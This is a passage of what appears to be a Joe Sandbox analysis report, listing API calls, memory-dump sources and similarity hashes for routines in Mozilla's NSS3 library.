• PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4CAE
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CC9
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CF4
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4D0B
• free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D5E
• free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D68
• PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C4D4D85
• PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C4D4DA2
• free.MOZGLUE(?), ref: 6C4D4DB9
• free.MOZGLUE(00000000), ref: 6C4D4DCF
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$R_smprintf$strlen$Alloc_Util
• String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
• API String ID: 3756394533-2552752316
• Opcode ID: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
• Instruction ID: d324d214552aceac84dbdb1468c0d23625c44a9b3373f380bc4fca2c22177879
• Opcode Fuzzy Hash: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
• Instruction Fuzzy Hash: 72418CB1900145ABEB12EF55AC54EBF3675AF82398F1B4128E8164BB01E731F925C7D3
APIs
  • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C4B6943
  • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C4B6957
  • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C4B6972
  • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C4B6983
  • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4B69AA
  • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4B69BE
  • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4B69D2
  • Part of subcall function 6C4B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4B69DF
  • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C4B6A5B
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6D8C
• free.MOZGLUE(00000000), ref: 6C4B6DC5
• free.MOZGLUE(?), ref: 6C4B6DD6
• free.MOZGLUE(?), ref: 6C4B6DE7
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6E1F
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E4B
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E72
• free.MOZGLUE(?), ref: 6C4B6EA7
• free.MOZGLUE(?), ref: 6C4B6EC4
• free.MOZGLUE(?), ref: 6C4B6ED5
• free.MOZGLUE(00000000), ref: 6C4B6EE3
• free.MOZGLUE(?), ref: 6C4B6EF4
• free.MOZGLUE(?), ref: 6C4B6F08
• free.MOZGLUE(00000000), ref: 6C4B6F35
• free.MOZGLUE(?), ref: 6C4B6F44
• free.MOZGLUE(?), ref: 6C4B6F5B
• free.MOZGLUE(00000000), ref: 6C4B6F65
  • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
  • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
  • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6F90
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6FC5
                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C4B6FF4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
• String ID: +`Ll
• API String ID: 1304971872-107483513
APIs
• calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C462007
• calloc.MOZGLUE(00000001,00000084), ref: 6C462077
• calloc.MOZGLUE(00000001,0000002C), ref: 6C4620DF
• TlsSetValue.KERNEL32(00000000), ref: 6C462188
• PR_NewCondVar.NSS3 ref: 6C4621B7
• calloc.MOZGLUE(00000001,00000084), ref: 6C46221C
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C4622C2
• GetLastError.KERNEL32 ref: 6C4622CD
• free.MOZGLUE(00000000), ref: 6C4622DD
  • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
  • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
Similarity
• API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
• String ID: T ]l$X ]l
• API String ID: 3559583721-1146210263
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C47DDDE
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C47DDF5
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47DE34
• PR_Now.NSS3 ref: 6C47DE93
• CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C47DE9D
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C47DEB4
• PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DEC3
• memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C47DED8
• PR_smprintf.NSS3(%s%s,?,?), ref: 6C47DEF0
• PR_smprintf.NSS3(6C5AAAF9,(NULL) (Validity Unknown)), ref: 6C47DF04
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF13
• PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DF22
• memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C47DF33
• free.MOZGLUE(00000000), ref: 6C47DF3C
• strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF4B
• free.MOZGLUE(00000000), ref: 6C47DF74
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47DF8E
Similarity
• API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
• String ID: %s%s$(NULL) (Validity Unknown)${???}
• API String ID: 1882561532-3437882492
APIs
• TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C4B2DEC
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C4B2E00
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E2B
• PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E43
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000,?), ref: 6C4B2E74
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000), ref: 6C4B2E88
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EC6
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EE4
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EF8
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B2F62
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B2F86
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B2F9E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B2FCA
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B301A
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B302E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B3066
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3085
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B30EC
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B310C
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3124
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B314C
                                                                                                                                                                                                                            • Part of subcall function 6C499180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C49918D
                                                                                                                                                                                                                            • Part of subcall function 6C499180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C4991A0
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B316D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                                                          • Opcode ID: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                          • Instruction ID: d64a09e59ee7621d3cac2b732c3709dcc1b3eddb7e37276ce909ca4f765f170a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF19DB5D006189FEF00DF65DC88F9ABBB4BF09318F054168EC05AB711EB31A995CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C499FBE
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C49A015
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C4B195C
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: EnterCriticalSection.KERNEL32(?,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B1970
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5), ref: 6C4B19A0
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A067
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A055
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A07E
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A0B1
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A0C7
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A0CF
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A12E
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A140
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A148
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A158
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A175
                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C49A1A5
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49A1B2
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C49A1C6
                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C49A1D6
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5,00000003,-00000004,00000000,?,6C48EAC5), ref: 6C4B5627
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B), ref: 6C4B564F
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B5661
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5), ref: 6C4B56AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                          • Opcode ID: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                          • Instruction ID: 14c73738dbf2f440161eb4b6963cf378240da025ca7cdd97921979b09d103696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2651E5B1D00319ABEB10DFA8DD45FAE7778EF4130DF110528E809AAB41E775A909C7E6
                                                                                                                                                                                                                          APIs
• TlsGetValue.KERNEL32 ref: 6C4B4C4C
• EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
• TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
• realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
• PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D4F
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4DB7
  • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
  • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
• TlsGetValue.KERNEL32 ref: 6C4B4DD7
• EnterCriticalSection.KERNEL32(?), ref: 6C4B4DEC
• PR_Unlock.NSS3(?), ref: 6C4B4E1B
• PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E2F
• PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4E5A
• PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E71
• free.MOZGLUE(00000000), ref: 6C4B4E7A
• PR_Unlock.NSS3(?), ref: 6C4B4EA2
• TlsGetValue.KERNEL32 ref: 6C4B4EC1
• EnterCriticalSection.KERNEL32(?), ref: 6C4B4ED6
• PR_Unlock.NSS3(?), ref: 6C4B4F01
• free.MOZGLUE(00000000), ref: 6C4B4F2A
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
• String ID:
• API String ID: 759471828-0
APIs
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFB4
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFC6
  • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
  • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
  • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFD6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFE6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFF6
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0006
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0016
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0026
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0036
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0046
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0056
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0066
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0076
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0086
• PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0096
